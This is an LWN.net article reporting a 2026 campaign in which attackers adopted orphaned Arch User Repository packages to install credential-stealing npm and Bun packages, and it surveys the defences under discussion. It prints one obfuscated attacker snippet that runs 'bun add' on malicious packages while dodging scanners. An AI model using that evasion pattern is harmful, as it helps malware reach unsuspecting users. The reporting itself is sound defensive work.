Welcome to LWN.net

The following subscription-only content has been made available to you 
by an LWN subscriber.  Thousands of subscribers depend on LWN for the 
best news from the Linux and free software communities.  If you enjoy this 
article, please consider 
subscribing to LWN
.  Thank you
for visiting LWN.net!

           By 
Joe Brockmeier
June 19, 2026

The 
Arch User Repository
 (AUR) has
been subjected to a sustained attack recently. The attacker, or attackers, have
spun up a series of new accounts then used them to adopt orphaned
packages and push malicious updates that would install malware on users' systems.
It is unclear how many users were compromised in the attack, but the maintainers
were playing Whac-A-Mole for several days to respond to each newly compromised
package. The project has 
turned
off the AUR's new-user registration
, for now, but it is unclear what its  
long-term response will be or if the AUR can be secured without major changes to
its existing collaboration model.

Why AUR is especially vulnerable

Arch Linux offers 
official
repositories
 of software, such as core and extras, that are overseen by the 
Arch Linux Developers
 and 
Package Maintainers

(see the 
official
contributors
 categories for more on the hierarchy). These packages are vetted by maintainers and
available for download in binary format using the 
pacman
 package manager.

The AUR, on the other hand, is a repository for software that has not yet made its
way into the official repositories and may never do so. Pacman does
not use the AUR repository directly, so users typically turn to a separate 
AUR helper
 application,
such as 
paru
 or 
yay
, for searching the AUR for software,
downloading the 
PKGBUILD
 files,
resolving dependencies, as well as compiling, installing, and updating
software.

The AUR is maintained by Arch's Package Maintainers—they respond to requests to
orphan or delete packages, and may 
move
packages from AUR to the official extras repository
, for example—but there
is no formal review process for a package to enter the AUR, nor for any updates to
it. The AUR contains the user-contributed 
PKGBUILD
 files that are
needed to compile software from source; there are no binary builds
provided. Currently there are more than 107,000 packages in the AUR, including 
nearly
14,000
 that are currently 
orphaned

and up for grabs.

AUR user registration is typically wide open to anyone who wishes to sign
up—currently there are more than 141,000 registered users. Any person who
has a registered user account on the AUR can adopt and make changes to orphaned
packages. There is no review process or vetting that takes place when a user
seeks to 
publish
a new package
 or adopt an orphaned one; a registered user only has to click
"Adopt Package" on the orphaned package's page and ownership of the package is
automatically granted.

Use at your own risk

Arch users are expected to exercise care when working with packages from the
AUR; they are warned that AUR 
PKGBUILD
 files are "
completely unofficial
and have not been thoroughly vetted. Any use of the provided files is at your own
risk
". In theory, users will review 
PKGBUILD
 files before building or
installing the software; it's unlikely that this happens in practice, particularly
when a user has already installed a package and is performing an update.

While Arch Linux does not provide builds for packages in the AUR, it does allow
"
-bin
" 
PKGBUILD
 files, which are used to download prebuilt
binaries from other locations. For example, users can install the 
LibreWolf
 fork of Firefox using the 
librewolf-bin

package from the AUR rather than having to build it from source. This is not just
convenient for open-source software with long build times; the AUR policies allow
proprietary software as well, which is unlikely to be distributed in source form. Of
course, this means that users have to be willing to trust that the AUR package
maintainer is not providing anything malicious in the binaries.

Arch is not the only distribution that has a service for providing "use at your
own risk", unreviewed, user-submitted content; Fedora has 
Copr
, the openSUSE project has
the 
Open Build Service
 (OBS), and Ubuntu
has 
Personal Package Archives

(PPAs). Each of those services allow a person to sign up without any review
process and build packages for download by other users of the distributions.

However, there are important differences between those services and the AUR. They
provide a build environment that is similar to the ones used for the official
distribution packages, and do not allow pre-built binaries or proprietary
software. The model for Copr, OBS, and PPAs is that a user creates a project under
their own user namespace; users have to add each repository from one of those
services separately.

For example, 
niri
 creator Ivan
Molodetskikh maintains a 
Copr repository
 for
Fedora users who want to run the tiling Wayland compositor. To install niri
from Copr, a user has to enable that repository specifically. It is possible for
other Copr users to create a similar project under their own namespace, but it is not
possible for another user to take over Molodetskikh's repository unless they
compromise his credentials. A would-be attacker could create a malicious fork on Copr
and try to lure Fedora users to add that package repository to their system instead,
but the attacker cannot simply pick up an orphaned Copr repository to compromise
users who have already added it.

The AUR, on the other hand, is much more relaxed about ownership; the

PKGBUILD
 files are all maintained under the AUR namespace. The 
rules

state that, when a new maintainer takes over an AUR package, they are supposed to add
their own information as maintainer and then list the prior maintainers as
contributors. That, however, is taken on trust and (as seen with the current attack)
can be easily abused.

Attacks

The AUR has been subject to a number of attacks over the years that took advantage
of orphaned packages. In 2018, 
three
packages were changed
 to include data-harvesting malware. There were two attacks
last year; on July 18 Quentin Michaud sent out an 
advisory

that three packages, all "
-bin
" packages for web browsers, were uploaded
with remote-access trojan (RAT) malware. In late July, there was 
another
attempt
, quickly detected; a "
google-chrome-stable
" package was uploaded
with another RAT.

Each of those attacks were small in scale. Not so the most recent
attack, which seems to have started (and was detected on) May 27;
Fabio Loli 
reported

that the "
plex-media-player
"
package had been updated to install a malicious npm package "
crypto-javascript
". The

PKGBUILD
 had been orphaned and then adopted by a brand-new
account. Several new packages with similar names had also been
uploaded by new accounts, all with the same attempt to lure users into
installing the malicious npm package.

On June 11, Mark Wagie 
reported

that a new maintainer had adopted the "
gnome-randr-rust
"
package and 
changed
the 
PKGBUILD
 file
 to add a dependency on 
npm
 and then use it to install a
malicious package called "
atomic-lockfile
". The attacker also changed the

Contributor
 stanzas in the 
PKGBUILD
 to replace the email addresses
of prior maintainers—but not the names. The Sonatype blog has an 
analysis

of the package; it included an eBPF program that would attempt to exfiltrate a wide
range of information from a user's machine including GitHub credentials, SSH
information, browser cookies, data stores from chat applications like Slack, Discord,
and more.

The attacker(s) went after 
hundreds of orphaned packages

instead of a select few as with the attacks last year. Jonathan Grotelüschen,
one of Arch's Package Maintainers, started a 
thread

on June 11 for people to report compromised packages.

I contacted Grotelüschen by email to ask about the attack; he said that the
attacker was creating accounts that would adopt a few packages and compromise them in
a similar fashion. New user registration was stopped on June 11 and then
re-enabled after the project added 
Anubis
 to try to foil the attacker's
mass account registrations. That did not work, so registration was disabled again on
June 12.

There was another wave of attacks on June 13, conducted with four
accounts that had been created before registration was shut down. The attacker
switched to using the 
Bun
 package manager to
attempt to install malicious packages instead of npm, and then attempted to
obfuscate the "
bun install
" command to evade scripts created to scan

PKGBUILD
 files for strings with "
npm
" or "
bun
":

    # post_install() {
    #   $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' 
    $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 
    'n'"e"'x'"t""f"'i''l''e''-''j''s'
    # }

While the obfuscation attempt would evade scripts looking for an install
command, any users who actually review the 
PKGBUILD
 file
would hopefully find it suspect.

Response

In total, more than 1,500 packages are known to have been affected. Grotelüschen
said that only about 20 new packages were created, the rest were orphaned
packages adopted by the attacker. As of this writing, registration is still
disabled. Grotelüschen said that the maintainers "
keep the AUR as clean as
we can, but at the scale of the AUR, our chance at catching absolutely
everything is very small
".

He added that "
the attack exclusively affected the user-managed content,
and the official repositories were unaffected
". Furthermore, the AUR
packages come with the disclaimer that they are "
use at your own
risk
". Users are responsible for reading 
PKGBUILDs
 to decide for
themselves if the content is safe to use, Grotelüschen said.

That policy, however, seems to be at odds with the practices of real-world
users. It is likely that many users treat the AUR as just another package
repository, and rarely if ever read a 
PKGBUILD
 file before installing
or updating a package. Even careful, security-minded people are unlikely to
review every single update to a 
PKGBUILD
, and attackers only need to
get lucky once. The AUR's policies may not be sufficient for today's security
threats.

The project is working on making it harder to create new accounts, he said, but
"
the AUR will not require real names or even government id verification
". He
noted that there are discussions on the AUR mailing list about ways to prevent or
detect similar attacks, but the ideas are coming from users rather than Arch
maintainers and developers.

Because it's 2026, several ideas of course center around using LLMs, such as Thomas
Stromberg's 
suggestion

to use a project he's working on called 
Atomdrift
, which uses "
tiny local deterministic
AI models, retrained constantly based on recent attacks and threat
feeds
". Andreas Reichel 
said

he had built something similar called 
aurscan
,
which can use Claude, Codex, or local LLMs.

Lukas Grumlik 
thought

that a change in how orphaned packages are handled might help. Instead of
allowing anyone to adopt an orphaned package, he proposed that such packages be
locked and set to a read-only state. Users could still download the

PKGBUILD
, but adoption would require "
a proper request to take it
over, explaining why it needs updating
", which would hinder bots from mass
takeovers. Reichel 
replied

that such a strategy would discourage well-intentioned people who want to fix
packages in good faith, but fail to stop "
a state sanctioned criminal
syndicate with at least 20k USD deep pockets
" and access to LLMs "
because
my LLM Agent has all the time it needs and will write better explanations
anyway
".

Another approach would be to build defenses into the AUR utilities rather than the
AUR itself. Fidel Ramos 
suggested

that paru display "
a loud warning
" when installing or upgrading a package that
had been orphaned and then adopted. That would likely require changes to the 
RPC
interface
 for the AUR in order to expose the information needed. Josephine
Pfeiffer has 
opened
a merge request
 that would provide that information.

Jo Guerreiro, maintainer of yay, 
said
 that there
had been many feature requests asking for changes along the lines of scanning for
"
npm install yyy
", delayed time updates, or maintainer-change
tracking. However, he argued that the next wave of malware would change tactics,
"
with all detection scanning fed into its generation cycle as 'iterate until it is
not detected'
". There was no way for yay to keep up with attackers, and he wanted
to avoid "
security theater
".

However, he did note that the latest release of yay would now display the last
modification time of a 
PKGBUILD
. Recent modifications do not mean that users
should not trust a package, but that they should be more careful and review the
package. Older packages are not necessarily more trustworthy, he said, "
but it is a
reason to be more confident that it has been reviewed by the community
".

Be careful out there

Considering the open-door policy for submissions and changes in the AUR, it's
almost surprising that it has taken this long for an attacker to conduct a campaign
at this scale. Nothing good lasts forever, though, and even if the person or persons
behind this attack decides to move on, there will almost certainly be copycats.

Slowing new signups may help to some degree, but malicious actors will keep
looking for ways to take advantage of AUR users who let their guard down in reviewing
their 
PKGBUILD
 files. The AUR is an impressive example of community
collaboration; it is unfortunate that there is always someone looking to abuse any
system built on trust.
